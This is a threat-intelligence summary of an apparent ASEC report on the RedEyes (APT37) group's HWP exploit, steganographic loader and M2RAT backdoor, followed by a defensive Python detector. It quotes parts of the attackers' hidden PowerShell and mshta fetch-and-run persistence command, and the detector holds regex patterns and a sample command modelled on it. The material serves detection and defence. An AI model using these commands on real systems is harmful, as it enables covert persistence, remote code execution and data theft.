Hangul (HWP) Malware Using Steganography: RedEyes (ScarCruft) – ASEC BLOG

ASEC analyzed RedEyes (ScarCruft/APT37) activity in Korea, revealing the group’s use of the Hangul EPS vulnerability CVE-2017-8291 to spread malware via steganography and a new M2RAT backdoor that employs shared memory for C2. The operation combines persistence through Run keys and PowerShell/mshta, data exfiltration via password-protected archives, and targeted information theft from individuals.

Keypoints

  • RedEyes (ScarCruft) used CVE-2017-8291 in Hangul EPS to trigger shellcode when a crafted HWP document is opened.
  • Steganography was used to conceal the initial payload inside a JPEG image, with the image sourced from wallup.net.
  • A dropped PE payload (lskdjfei.exe) downloads a backdoor (M2RAT) and injects into explorer.exe for C2 and persistence.
  • Persistence is achieved via a Run key in HKCU\Software\Microsoft\Windows\CurrentVersion\Run, invoking PowerShell and mshta on boot.
  • The newly observed M2RAT uses shared memory sections (Map2*) for C2 and supports extensive exfiltration features (screen capture, keystrokes, document/voice data).
  • Exfiltration includes password-protected RAR archives of targeted data, sent to attacker servers, with data staged under %TEMP% paths.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – The vulnerable EPS file (CVE-2017-8291) is embedded in a document and, when opened, triggers shellcode execution in a third-party module. Quote: ‘the vulnerable EPS file (CVE-2017-8291) was included in the “form.hwp” file, and when the user opens the document, the shellcode executes in the third-party module.’
  • [T1027.001] Obfuscated/Compressed Files and Information (Steganography) – Payload is hidden inside an image via steganography to evade network detection. Quote: ‘The malware was embedded in an image using a steganography technique.’
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run with a PowerShell/mshta startup command. Quote: ‘The command registered in the registry Run key is …’
  • [T1059.001] PowerShell – Used as part of the startup command to run hidden PowerShell commands. Quote: ‘PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass …’
  • [T1218.005] Mshta – Signed binary proxy execution via mshta to fetch and execute code. Quote: ‘… || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html’
  • [T1071.001] Web Protocols – C2 communications over HTTP(S) via POST bodies to issue commands. Quote: ‘In the C&C command scheme, commands are received from the attacker server in the body of a POST request, and …’
  • [T1113] Screen Capture – M2RAT captures the screen as part of data exfiltration. Quote: ‘[Figure 11] M2RAT C&C … screen capture’
  • [T1056.001] Input Capture (Keylogging) – Keylogging data exfiltration as part of data theft. Quote: ‘keylogging data exfiltration’
  • [T1041] Exfiltration Over C2 Channel – Data including documents and audio is exfiltrated via attacker servers, with passwords and archives used. Quote: ‘Data exfiltration … after compressing it with a WinRAR password, the result is sent to the attacker server.’
  • [T1560.001] Archive Collected Data – Data is compressed with WinRAR (password-protected) before exfiltration. Quote: ‘RAR compression options …’

Indicators of Compromise

  • [MD5] EPS file – Exploit/EPS.Generic (2023.01.16.03) – 8b666fc04af6de45c804d973583c76e0
  • [MD5] Steganography JPEG – Data/BIN.Agent (2023.02.15.00) – 93c66ee424daf4c5590e21182592672e
  • [MD5] PE file (Stage PE) – Trojan/Win.Loader.C5359534 (2023.01.16.03) – 7bab405fbc6af65680443ae95c30595d
  • [MD5] PowerShell script Downloader – PS.Generic.SC185661 (2023.01.16.03) – 9083c1ff01ad8fabbcd8af1b63b77e66
  • [MD5] M2RAT – Trojan/Win.M2RAT.C5357519 (2023.01.14.01) – 4488c709970833b5043c0b0ea2ec9fa9
  • [MD5] Mobile data theft – Infostealer/Win.Phone.C5381667 (2023.02.14.03) – 7f5a72be826ea2fe5f11a16da0178e54
  • [Domain/URL] Steganography image source – wallup.net (image used to hide payload)
  • [File/Path] Dropped PE path – %Temp%\lskdjfei.exe (final backdoor launcher)
  • [Registry] Run key for persistence – HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value RyPO
  • [Registry] M2RAT identifiers – HKCU\Software\OneDriver, values Version (MAC XOR 0x5C) and Property (server address XOR 0x5C)
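As an added illustration (not code from the ASEC report), the following Python checks two of the registry artefacts listed above on constructed data: Run values that combine hidden PowerShell, an execution-policy bypass and a remote mshta call, and XOR-0x5C-encoded values under the OneDriver key. The key and value names come from the page; the sample command, the MAC and the server address are made-up placeholders.

```python
import re

# Constructed sample registry contents (not data from the report): one benign Run
# value and one modelled on the persistence command quoted in the write-up. The
# part of the command the report elides is left as a placeholder, and the URL is
# a defanged dummy, not the real one.
SAMPLE_RUN_VALUES = {
    "Updater": r'"C:\Program Files\Example\updater.exe" /background',
    "RyPO": ("PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass "
             "<elided> || mshta hxxps://www.example[.]invalid/popup/handle/1.html"),
}

# Three traits of the quoted startup command, checked independently so that a
# value is only flagged when several of them coincide.
RUN_VALUE_INDICATORS = {
    "hidden_powershell": re.compile(r"powershell(?:\.exe)?\b.*-windowstyle\s+hidden", re.I),
    "execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "mshta_remote_url": re.compile(r"mshta\s+(?:hxxps?|https?)://\S+", re.I),
}


def run_value_indicators(command: str) -> list[str]:
    """Return the names of the indicators that match one Run-key command line."""
    return [name for name, rx in RUN_VALUE_INDICATORS.items() if rx.search(command)]


def scan_run_values(run_values: dict[str, str], minimum: int = 2) -> dict[str, list[str]]:
    """Map each Run value that trips at least `minimum` indicators to the indicators hit."""
    hits = {name: run_value_indicators(cmd) for name, cmd in run_values.items()}
    return {name: found for name, found in hits.items() if len(found) >= minimum}


def decode_xor_0x5c(blob: bytes) -> str:
    """Recover the plaintext of a registry value the report says is stored XOR 0x5C."""
    return bytes(b ^ 0x5C for b in blob).decode("ascii", errors="replace")


# Constructed values for the OneDriver key: a dummy MAC and a dummy server
# address, each XOR-encoded with 0x5C the way the report describes.
SAMPLE_ONEDRIVER_VALUES = {
    "Version": bytes(b ^ 0x5C for b in b"00-11-22-33-44-55"),
    "Property": bytes(b ^ 0x5C for b in b"c2.example.invalid"),
}

if __name__ == "__main__":
    print(scan_run_values(SAMPLE_RUN_VALUES))
    print({k: decode_xor_0x5c(v) for k, v in SAMPLE_ONEDRIVER_VALUES.items()})
```

On a live host the two dictionaries would be filled from the Run key and the OneDriver key instead of the constructed samples; the matching and decoding logic stays the same.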

Read more: https://asec.ahnlab.com/ko/47622/